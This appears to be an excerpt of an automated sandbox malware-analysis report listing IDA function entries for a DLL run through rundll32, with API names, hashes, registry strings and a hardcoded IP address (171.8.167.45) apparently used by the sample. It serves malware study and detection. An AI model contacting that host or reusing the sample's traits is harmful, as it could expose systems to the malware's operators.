                                                                                    • API String ID: 3702945584-3718352646
                                                                                    • Opcode ID: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
                                                                                    • Instruction ID: 9121a4dbc030fef007b745f88a0fe18748c482634fd5ebee216f5006264a8ac8
                                                                                    • Opcode Fuzzy Hash: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
                                                                                    • Instruction Fuzzy Hash: AC116A72600B4482EB508F29E44438AB760F789BF4F108316EB79437E4CF79C688CB84
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentSleepThread
                                                                                    • String ID: 171.8.167.45
                                                                                    • API String ID: 1164918020-2723241389
                                                                                    • Opcode ID: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
                                                                                    • Instruction ID: 739a1f1183ec9c18e579ba8ee55cb859ca32a6d953d7c9429809cc63265ca520
                                                                                    • Opcode Fuzzy Hash: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
                                                                                    • Instruction Fuzzy Hash: B201D13370425586E7A3DFA9B88039E66A0F74C7E0F058431FF4487655EF79C99A8B80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value
                                                                                    • String ID: MsgCenter$opentime_afterinstall
                                                                                    • API String ID: 3702945584-3718352646
                                                                                    • Opcode ID: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
                                                                                    • Instruction ID: 21b9b515d364e76d08f8b9de98a0e6c83aa7314f475d7e108810017b28aec3e9
                                                                                    • Opcode Fuzzy Hash: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
                                                                                    • Instruction Fuzzy Hash: DA0188B2611B4482DB10DF69D854389B760F788BB0F00831AEA79137E4DF78C699CB44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionThrow
                                                                                    • String ID:
                                                                                    • API String ID: 432778473-0
                                                                                    • Opcode ID: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
                                                                                    • Instruction ID: 38ed7ffc1fc9f375285380fd3d7b3dc2d70f7ac5fc31fc0dcffbf51ad022335a
                                                                                    • Opcode Fuzzy Hash: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
                                                                                    • Instruction Fuzzy Hash: 9D0184B1650A88C9E79DFF33A8063FB6212BBD87C0F18C835B9954B65BDE25C21A4700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%